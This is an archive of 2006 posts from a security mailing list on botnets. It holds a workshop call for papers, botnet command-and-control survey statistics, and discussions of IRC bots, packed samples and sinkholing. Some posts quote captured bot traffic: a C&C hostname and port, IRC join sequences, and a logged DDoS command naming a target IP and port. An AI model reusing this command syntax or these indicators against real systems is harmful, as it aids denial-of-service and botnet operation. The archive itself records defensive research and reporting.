[botnets] CFP: DA Workshop - ISOI
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- This is a call for papers for a DA Workshop (ISOTF/TISF DA). Its name is: Internet Security Operations and Intelligence Workshop or ISOI for short. DA stands for Drone Armies (botnets), which is the main subject of this workshop. I apologize for those who get this message multiple times. Introduction This workshop is for the purpose of bringing together members of the DA and MWP operational communities and share information, as well as plan our future operations. It is open to other operational communities as specified below. Among the attendees are: Professionals from ISPs, Anti Viruses, Anti Spam, CERTs, Law Enfrocement, Academia, etc. coming together to work on the most recent technology, intelligence and operations being done online today for the security of the Internet. This ISOI DA Workshop is being hosted by Cisco Systems, Inc., whom we would like to thank at this time. CFP --- The call for papers is open to the public. The main subject of interest is botnets. Secondary subjects are Denial of Service attacks and phishing. Submission is simple, email me directly with your topic and some data to back it up by July 23rd. Scope: -- This year's workshop will be mainly on the subject of botnets. Secondary subjects include Denial of Service attacks and phishing. This workshop will provide with the usual benefits such as lectures and networking, but mostly we will discuss the latest occurrences, technology and intelligence and our future plans, as well as coordination and information sharing between other operational and research communities. Cooperation with law enforcement will also be covered. Details: Date: Thursday, August 10, 2006 When: 9:30 a.m. - 5:00 p.m. Location: Cisco Systems, Inc. Building C 150 Tasman Drive San Jose, CA 95134 Attending Remotely: --- A phone conference bridge and web conference will be available to share presentations for remote attendees. Intended Audience: -- Hands-on people and decision makers. Attendance: --- The workshop is organized by the DA and MWP communities with the much appreciated help of Cisco Systems, Inc., and is closed to members of the following communities: DA, MWP (and sister communities such as routesec), OARC, NSP-SEC. FIRST and the honey-net project. If you are not a member and would like to attend, feel free to send a request. We would be happy to learn of your interest. The workshop is closed to reporters. Please verify your arrival by August 1st, space is limited. Costs: -- Attendance is free. -- Gadi Evron, ISOI/DA Coordinator, [EMAIL PROTECTED] ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] Drone Armies CC Report - 30 Jun 2006 (fwd)
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- -- Forwarded message -- Date: Fri, 30 Jun 2006 21:51:33 -0500 From: [EMAIL PROTECTED] To: nanog@merit.edu Subject: Drone Armies CC Report - 30 Jun 2006 This is a periodic public report from the ISOTF's affiliated group 'DA' (Drone Armies (botnets) research and mitigation mailing list / TISF DA) with the ISOTF affiliated ASreport project (TISF / RatOut). For this report it should be noted that we base our analysis on the data we have accumulated from various sources, which may be incomplete. Any responsible party that wishes to receive reports of botnet command and control servers on their network(s) regularly and directly, feel free to contact us. For purposes of this report we use the following terms openthe host completed the TCP handshake closed No activity detected reset issued a RST This month's survey is of 3420 unique, domains (or IPs) with port suspect CCs. This list is extracted from the BBL which has a historical base of 10579 reported CCs. Of the suspect CCs surveyed, 624 reported as Open, 1110 reported as closed, and 580 issued resets to the survey instrument. Of the CCs listed by domain name in the our CC database, 4778 are mitigated. Top 20 ASNes by Total suspect domains mapping to a host in the ASN. These numbers are determined by counting the number of domains which resolve to a host in the ASN. We do not remove duplicates and some of the ASNs reported have many domains mapping to a single IP. Note the Percent_resolved figure is calculated using only the Total and Open counts and does not represent a mitigation effectiveness metric. Percent_ ASN Responsible Party Total OpenResolved 19318 NJIIX-AS-1 - NEW JERSEY INTERN 75 13 83 23522 CIT-FOONET 51 19 63 13301 UNITEDCOLO-AS Autonomous System of 51 14 73 4766 KIXS-AS-KR 39 14 64 4134 CHINANET-BACKBONE 27 14 48 9318 HANARO-AS 26 8 69 4314 IIS-64 I-55 INTERNET SERVICES 26 2 92 7132 SBC Internet Services 25 6 76 33597 InfoRelay Online Systems, Inc. 24 0100 8560 SCHLUND-AS 24 6 75 4837 CHINA169-Backbone 23 10 57 3561 Savvis 22 2 91 30315 Everyones Internet 22 10 55 13749 EVRY Everyones Internet21 1 95 1659 ERX-TANET-ASN1 21 6 71 174 Cogent Communications 20 13 35 13237 LAMBDANET-AS 20 15 25 13213 UK2NET-AS UK-2 Ltd Autonomous Syste20 0100 21840 SAGONE Sago Networks 19 3 84 29073 COLINKS-AS Colinks web and game hos19 18 5 Top 20 ASNes by number of active suspect CCs. These counts are determined by the number of suspect domains or IPs located within the ASN completed a connection request. Percent_ ASN Responsible Party Total OpenResolved 23522 CIT-FOONET 51 19 63 29073 COLINKS-AS Colinks web and game hos19 18 5 13237 LAMBDANET-AS 20 15 25 4766 KIXS-AS-KR 39 14 64 13301 UNITEDCOLO-AS Autonomous System of 51 14 73 4134 CHINANET-BACKBONE 27 14 48 19318 NJIIX-AS-1 - NEW JERSEY INTERN 75 13 83 174 Cogent Communications 20 13 35 30315 Everyones Internet 22 10 55 4837 CHINA169-Backbone 23 10 57 10032 HGC-AS-AP Hutchison Global Crossing11 10 9 9911 CONNECTPLUS-AP Singapore Telecom 13 10 23 35908 Krypt Technologies Inc.13 9 31 36263 forona.10 8 20 9318 HANARO-AS 26 8 69 9600 SONY CORPORATION7 7 0 16265 LEASEWEB AS13 7 46 18942 WEBHO-3 WebHostPlus Inc 7 6 14 1659 ERX-TANET-ASN1 21 6 71 12322 PROXAD AS for Proxad ISP7 6 14 Randal Vaughn Gadi Evron Professor ge at linuxbox.org Baylor
[botnets] eu spam symposium coverage and spammerX
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Spamhuntress is doing some coverage, it's interesting: http://spamhuntress.com/ ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] microsoft statistics to LOOK at
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- http://download.microsoft.com/download/3/d/e/3de2470b-ab9a-4a7f-b760-ee2421df294a/WindowsRemovalToolWP.doc .doc link Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] NTFS Streams rootkit?
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- First reported in 1998 (http://www.securiteam.com/windowsntfocus/3H5PQS0N5G.html) and reported since every couple of years or so (last time was last week on bugtraq), now (that we know of) there is apparently a rootkit using this technique. Check out this discussion at Sysinternals: http://www.sysinternals.com/forum/forum_posts.asp?TID=6084PN=1 Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] [Bulk] Re: Botnets welcome?
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Tue, 30 May 2006, Craig Holmes wrote: On Tuesday 30 May 2006 04:55, Gadi Evron wrote: Public IRC servers on IRC networks have been used for botnets extensively in the past. Even though they were in denial, the situation in around 2002-2003 was that 20 to 50 per cent of the big networks were drones. In my experience, a lot of the reason that public IRC servers tolerate drones drone farmers is not by choice. There are (or were) few IRC servers that could withstand a full-out DDoS attack by large scale drone network. Waltzing into a drone channel and k-lining 10,000+ drones can have many effects: 1) This much traffic could cause the IRC server to lag to desync (on legacy IRC servers, anyway) 2) Poorly configured bots would hammer the IRC port day and night (times 10,000) 3) A well-designed drone could use a dynamic dns service to update and use a different server. The then angry farmer would DDoS the crap out of the public IRC server he was just k-lined from. I personall support them, but I believe the days of botnet hunting their way are over since about 2000. Still, I've been wrong before, and I've never seen any better way of learning about botnets. Could you elaborate a little on this point? I feel that the shadowserver people are doing a good job, and I feel their methods are most effective. Fact is, I can think of no better way to do what they're doing. They are not doing just a good job, they are doing amazing an job. Plus, they are good people and under a very good leadership. That's how most of us who are in this thing since the start indeed started. I am saying though that in my opinion it is more of a starting point for them to learn and move to mitigating from hunting. Projects take time and they are taking good and firm steps, but they are still new in this. I have no issues with their activities or they would have heard from me directly, as they are coleagues and friends. This is not about them, it's about interacting with the Bad Guys, snooping their servers and how these are eventually mitigated. These have been misconcieved as far as I am concerned on this list so I am elaborating on these points. In my opinion, most of what ISP's as an example are concerned with, which is mitigating the CC's is no longer even working. The CC's are much moire robust and distributed, not to mention with backup control channels. Mitigating them has become close to useless other than moving the localized trouble to someone else's back yard. Further, by just killing CC's, which was a very good idea originally, ISP's have caused the Bad Guys to learn, evolve and invent new technologies. Killing CC's was still useful though, to hold back the tide. Today, it is no more than a means of making it a bit more painful for the Bad Guys to operate, and a huge waste of abuse-handling resources is done alone. Shadowserver, much like the ISP's and many of us concentrates mostly onb that point. Further, they are evolving and learning as they go. Thery had some mistakes like all of us, and they are fast becoming far better at what they do. That's just my general opinion of the activity of hunting boitnets in general. Interacting with bad guys, etc. Nicholas can help me better articulate my thoughts on his project, perhaps, but this is not criticism toward him or them. Just how we, all of us, generally do things these days. This is an economic problem and we are no longer causing this to be more costly or risky for the bad guys by killing their CC's. That's ancient tech. The fact that brand new groups like Shadowserver emerge, join the fight and learn new things is critical, as unlike most of us, they actually see that what most of us do these days is useless, just like we did back when we got started. Our lessons back then have become set values and traditions, looking at some things as even inherently wrong. They are re-learning our original art and re-inventing the scene. I hope this is a better explanation. They are new and inexperienced, but I don't see it as a problem as they are serious. Being young is something you grow out of (as I once answered in a job interview). Craig ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Malware TCP connect report
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Mon, 22 May 2006, Nicholas Albright wrote: This list was created by Chas Tomlin of Shadowserver.org. All TCP connections were verified before posting. Naturally, the shadowserver guys also verify these IRC servers reply as IRC servers, the TCP handshake test is only to see what's still up for the sake of this report, but they also conduct manned checks. Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] RFC: public efforts in the botnets realm
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Hi, this is an FYI. A discussion will now commense on the DA list to try and measure if public efforts are indeed a good idea, and how much good vs. bad they cause in the fight against botnets, distributed denial of service attacks, Internet survivability and online crime, as it can indeed be measured. I would also like the community's opinion on the subject at hand, so that we can relay it and make a more client-oriented decision (take the needs of the community into consideration as well). Thanks, Gadi. -- Forwarded message -- Date: Mon, 22 May 2006 02:02:48 -0500 (CDT) From: Gadi Evron [EMAIL PROTECTED] To: closed botnets list Subject: public efforts Hi guys. our public efforts in the botnet realm thus far consist of *mainly*: 1. The monthly CC report. 2. Public botnet reporting to us. 3. Public discussion list. The monthly report is now largely accepted by most in the net-ops community as reliable, and it meets the test of scrutiny. We had some early bumps on how we represent data, what data we want to show and what information we want to deduce from it - but I think we are there now. Public botnet reporting to us is going great. I stopped relaying them to the list is it is extremely time consuming for me, but they are dealt with. As soon as a volunteer who doesn't just want to talk to the press and take them off my back but also do this work comes along, we will get these again here too. The public discussion list has in my opinion brought an immense public awareness, law enforcement interest and industry work. Little to no new information was divulged there that the Bad Guys would not already know with their gigs of bot sources and exchange networks (not to mention support web forums). That's just my opinion, feel free to chime in. The monthly reports are great, as is getting data from the public of net-ops and sys-admins. The discussion list is on a tight leash, but I would like those of you who have been monitoring it and disagree with me to do so here and tell us why we failed there. If we indeed see the botnets@ list as a success, I would like us to move forward and divulge more redundant already public information to the public, and help move the cause along further than by classifying every bit of useless information as top secret. Thanks, I am looking forward to your input, Gadi. -- In a good cause, there are no failures, only delayed successes. ~Isaac Asimov, In a Good Cause. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Weird bot
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Sun, 21 May 2006, Jörg Weber wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Hi Gadi, Just a guess: an IRC based CC which is either on a bad connection or very over-loaded with bots. I don't think it is a very bad connection, as symantec.loves.the.cock.pheer.biz seems to be an alias for at least seven Ips. Plus, the response time itself is not bad on the commands I figured out. I'd think it is an IRC-Based CC without implementing all or some modified subset of IRC commands. Are you able to connect and then have problems getting information because of disabled/renamed commands, etc. or are not even connecting (timing out, refused, etc.)? Cheers, Joerg -- Joerg Weber M. A. Teamleiter Netzwerk-Sicherheit/Netzwerk-Applikationen infoServe GmbH Nell-Breuning-Allee 6 D-66115 Saarbruecken T: (0681) 8 80 08 - 59 F: (0681) 8 80 08 - 33 www.infos.de mailto: [EMAIL PROTECTED] -Original Message- From: Gadi Evron [mailto:[EMAIL PROTECTED] Sent: Sunday, May 21, 2006 12:20 PM To: Jörg Weber Cc: botnets@whitestar.linuxbox.org Subject: Re: [botnets] Weird bot On Sat, 20 May 2006, Jörg Weber wrote: Hi folks, I found this funny thing during the weekend: It connects to symantec.loves.the.cock.pheer.biz 18067 and seems to initiate something akin to an IRC session: USeR l l l l NiCK l5-00050c7b :a4 433 * l5-00050c7b : NiCK l5-00051247 :a4 001 l5-00051247 : USeRHOST l5-00051247 :a4 302 l5-00051247 :[EMAIL PROTECTED] JOiN #l5t3 dlrowymx0ri :a4 366 l5-00051247 #l5t3 : Trying to connect to that box by telnet/netcat/irc fails at times and works sometimes, but I couldn't get the server to spill out any useful information. Does someone have a clue what this beast is? Just a guess: an IRC based CC which is either on a bad connection or very over-loaded with bots. Gadi. Cheers, J. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Weird bot
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Sat, 20 May 2006, Jörg Weber wrote: Hi folks, I found this funny thing during the weekend: It connects to symantec.loves.the.cock.pheer.biz 18067 and seems to initiate something akin to an IRC session: USeR l l l l NiCK l5-00050c7b :a4 433 * l5-00050c7b : NiCK l5-00051247 :a4 001 l5-00051247 : USeRHOST l5-00051247 :a4 302 l5-00051247 :[EMAIL PROTECTED] JOiN #l5t3 dlrowymx0ri :a4 366 l5-00051247 #l5t3 : Trying to connect to that box by telnet/netcat/irc fails at times and works sometimes, but I couldn't get the server to spill out any useful information. Does someone have a clue what this beast is? Just a guess: an IRC based CC which is either on a bad connection or very over-loaded with bots. Gadi. Cheers, J. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] blue security folds
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- I just got this in email: http://wired.com/news/technology/0,70913-0.html?tw=wn_index_1 Now they suddenly care about DDoS by a botnet and of the health of the Internet, I wonder what about their huge DDoS botnet now that they are gone? Not that they ever affected even one spammer. Okay, maybe one. :) Gadi. -- /~\ The Green \ / Ribbon Campaign X Against Purple / \ Ribbons!-- The Geometry of Shadows, Babylon 5. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] remember Jason?
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Our friends at F-Secure just posted this: http://www.f-secure.com/weblog/#0861 F-Secure is not really involved with the zuper-zecret botnet/phishing/etc. fighting club, but they are cool amazing guys who have always been there to help the fight. Gadi. -- /~\ The Green \ / Ribbon Campaign X Against Purple / \ Ribbons!-- The Geometry of Shadows, Babylon 5. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] sandbox ddos'd
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- http://www.norman.com/special/34046 ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Web-Based Bots
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- David Cheney wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- I too am interested in botnets whose command and control mechanism is not IRC. The web and the community seem to be ripe with anecdotal evidence of elusive networks based on a variety of covert communication channels, but as of yet I have not seen any real evidence. There is an analysis of Phatbot which claims it uses a striped down version of WASTE: http://www.lurhq.com/phatbot.html But I haven't been able to confirm this one yet (looking for a sample). If anyone finds such a beast, I would greatly appreciate any evidence. I am connecting you with the guy who wrote that. Web CC's of the BASIC form have been with us for almost a decade in the uses we see for them today. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Sink Hole Network
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Georg Wicherski wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- If you already know the DNS, just force responses to 0.0.0.0 at your DNS gateway. Additionally add a Snort rule for these queries that firewalls the infected clients totally out. Then tell the owners to manually disinfect as `.remove' commands are highly unreliable and the syntax varies anyway. Regards, Georg 'oxff' Wicherski To quote an older email: Dan wrote: Yanno, Most bot code I've seen has a 'kill' or uninstall feature built in. It might be an idea to built a counter botnet, that will act in our favor when a botnet is found. We could have a bot infiltrate the existing net, and attempt to issue a number of kill/uninstall commands, so the net will eat itself. *shrug* Hi Dan. :) That depends significantly on several issues: 1. Is that command remote? (I.e. requiring a remote connection and a remove?) If so, I'd hesitate to do so. Even if it was not illegal, it is indeed unethical to connect to the remote machine uninvited. Further, your actions can result in damage to the remote machine. 2. Is this done with a remote kill command? Same as above, but the bot will re-surface on next re-boot. 3. Is this done by uploading a cleaner? If that is the case, you may potentially also cause the machine to die. :) 4. Is this done via IRC commands at the CC? I have little problem with that, except that it may put you at risk. All that said, here are a few items to think of: 1. If the remote machine in indeed compromised and insecure, it will just get re-infected shortly. 2. If that is the case, it is also already probably infected by QUITE A FEW other beasties and is already a part of other botnets (many other!) Before I go on with wisdom of old, though, I'd like to hear some thoughts from fresh people here. :) I am very much in favor of actively mitigating risks, but there are costs to any benefits and sometimes the benefits are not worth it, are extremely short lived or just an illusion. Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] DDoS attack
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Nicholas Albright wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Shadowserver.org got hit with a DDoS attack yesterday. Well, it seems like you were slow-to-down for a short while, but no real effect. We believe that the attack was in retaliation of our monitoring. No kidding. :) Well, you guys have been vocal. Hmm. I suppose we should do something about this guy. How silly is he, DDoSing people who without life monitor and report CC's daily? The launch came from ip 64.18.139.107 port 5100 channel ##kenny: From CC: Wed Apr 5 23:01:48 2006 pubmsg [EMAIL PROTECTED] ##kenny ['.rape.ssf 64.34.165.168 80 95000'] Does anyone else have anymore details on this network? More off-line, but let's just say some of us yesterday put him on our special radar. He will have a hard time to operate or keep his CC's live from now on if he makes too much noise. Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] botnet reporting
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Kyle Lutze wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 a new botnet reporting system has been setup at shadowserver. for all interested, http://www.shadowserver.org/botnet/main_page.php there are currently ~30 botnets in the database, and it's only been up for a few days. Naturally, everyone is welcome to start their own systems. If it means anything to anyone, I personally trust the people at Shadowserver. I am not aware of how they report the information, but I am sure they will come up with something. Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] AOL AIM bots
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- scot wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Tuesday 21 March 2006 21:06, scot wrote: Please disregard the email address in my previous post i can only assume he pasted me the wrong email address, i'll try to catch up with him and have a correction made, sorry for any inconvenience this might have caused. [EMAIL PROTECTED] My infamous FD email address. No prob. :) ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] AOL AIM bots
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- scot wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Wednesday 22 March 2006 03:30, scot wrote: Apoligies again for the confusion this is the proper email address to send to if you have any information regarding AOL Aim client bots [EMAIL PROTECTED] So who is this guy and why are we sending him information? ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Skype - the next vector?
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- John Draper wrote: Jose Nazario wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Thu, 16 Mar 2006, Gadi Evron wrote: http://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-biondi/bh-eu-06-biondi-$ This URL is an incomplete URL - Could you please re-post this URL. I really would like to check this presentation out. Press the right arrow key. ;) Tell me if that works. Damn wrapping. Always gets me too. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] darkdreamz isocore
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Brian Allen wrote: A google search on these two hostnames, irc.darkdreamz.com and irc.isocore.biz, only turned up a few hits, but they seemed to be related to filesharing. How can I tell if this is a few students trying to get music, games, etc. or if these are bots connecting to a CC? Any such hit may often be a legitimate IRC server, or a very shaky one, still used for chat. In this case: NICK [Niger]-029 NICK [Niger]-015 NICK [Niger]-017 NICK [N]-487 My best would be on a botnet, whether full-fleged or for xdcc. If you want to be sure, one way is to see what else sits on those channels. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] Skype - the next vector?
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Ami (and me) just wrote about it: http://blogs.securiteam.com/index.php/archives/355 But if you have the time, I'd STRONGLY suggest you go straight to the amazing work at the source: http://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-biondi/bh-eu-06-biondi-$ Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Modified upx?
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Wed, 15 Mar 2006, Tron wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- -BEGIN PGP SIGNED MESSAGE- Hash: RIPEMD160 I have a file, rp5.exe, snared by my running instance of nepenthes, which is quite obviously compressed via UPX... upx -l rp5.exe Ultimate Packer for eXecutables Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006 UPX 1.94 beta Markus Oberhumer, Laszlo Molnar John Reiser Mar 11th 2006 File size Ratio Format Name -- --- --- 152064 - 61952 40.74%win32/pe rp5.exe ... but which I can't decompress... upx: rp5.exe: Exception: checksum error. Which is obviously why Norman sandbox stated, for this particular binary.. nepenthes-9291587b85191b06bbf80d4ea1fb142e-rp5.exe : Not detected by sandbox (Signature: NO_VIRUS). Presumably, this means that whoever compressed this binary used an altered version of upx? I am not sure what the case is here, but many different variants of UPX are out there. You need to trace it and find the real entry point. Gadi. See Norman Sandbox reference 20060315-665 for the full (and unhelpful) report. Regards. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFEGF/1BzVUSpB18YoRA6H7AJ0WBPAxFa9QZY3qCXpX/+19HUs+4gCeNdaF qatvE1+3grAjB4H13Hr5MMQ= =9jpt -END PGP SIGNATURE- ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Modified upx?
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- M45T3R S4D0W8 wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On 3/15/06, Tron [EMAIL PROTECTED] wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- -BEGIN PGP SIGNED MESSAGE- Hash: RIPEMD160 I have a file, rp5.exe, snared by my running instance of nepenthes, which is quite obviously compressed via UPX... upx -l rp5.exe Ultimate Packer for eXecutables Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006 UPX 1.94 beta Markus Oberhumer, Laszlo Molnar John Reiser Mar 11th 2006 File size Ratio Format Name -- --- --- 152064 - 61952 40.74%win32/pe rp5.exe ... but which I can't decompress... upx: rp5.exe: Exception: checksum error. Which is obviously why Norman sandbox stated, for this particular binary.. nepenthes-9291587b85191b06bbf80d4ea1fb142e-rp5.exe : Not detected by sandbox (Signature: NO_VIRUS). Presumably, this means that whoever compressed this binary used an altered version of upx? See Norman Sandbox reference 20060315-665 for the full (and unhelpful) report. Regards. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFEGF/1BzVUSpB18YoRA6H7AJ0WBPAxFa9QZY3qCXpX/+19HUs+4gCeNdaF qatvE1+3grAjB4H13Hr5MMQ= =9jpt -END PGP SIGNATURE- ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets There are various Utilitys for making it impossable to Unpack a UPXed EXE. Nothing is impossible. Not trying to be annoying.. just is. You can make it as close to impossible as possible. :) (now I am being annoying) which is the point behind software protection. Make it difficult *enough*, and you achieved you goal. If it sits on your computer, you will eventually break it. Be careful about saying never, ever, impossible, all, non, and 100%, etc. I always fall on these as I often mean most, almost all, etc. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] botnet in japan...
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Lindsey Chesnutt wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- I caught a bot with nepenthes this morning. Norman says that it connected to this address - o2.zener.co.jp on port 4997 (TCP). There are about 25 active bots in the channel #satan2, all with IP addresses encrypted. It is an rxbot. Thanks - being followed-up on. :) Gadi. ___ botnets mailing list To report a botnet PRIVATELY please email: [EMAIL PROTECTED] http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] web remote inclulde path
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- bodik wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- hi, this list seems to be for white Jedi ;) so I'll add my contribution. Even with low expirience I believe I found botnet through snort report about WEB remote include path: Any contribution is welcome. We are looking into it, thanks! ___ botnets mailing list To report a botnet PRIVATELY please email: [EMAIL PROTECTED] http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] found a botnet
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Jay Lists wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Hello, I just joined this list because I have found a botnet. It might already be known but I figured I would report it anyway. I have found the irc server they are connecting to and there are currently a little over 300 bots on the channel. Not sure how much info I should post here, so please let me know. Thanks, Jay As much as you feel comfortable with. You can always use the private address for more. :) Thanks! Gadi. ___ botnets mailing list To report a botnet PRIVATELY please email: [EMAIL PROTECTED] http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] tracking a botnet for some time now...
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- [EMAIL PROTECTED] wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- hi, ive been following this moron bot owner around for a while. the guy appears to be using them to load spyware. im having trouble getting one of his last ircds shut off.. anyone with any connections at theplanet.com? thier abuse@ is useless. Yes, please contact us offline. The Planet are very responsive to botnet reports. Gadi. -- http://blogs.securiteam.com/ Out of the box is where I live. -- Cara Starbuck Thrace, Battlestar Galactica. ___ botnets mailing list To report a botnet PRIVATELY please email: [EMAIL PROTECTED] http://www.whitestar.linuxbox.org/mailman/listinfo/botnets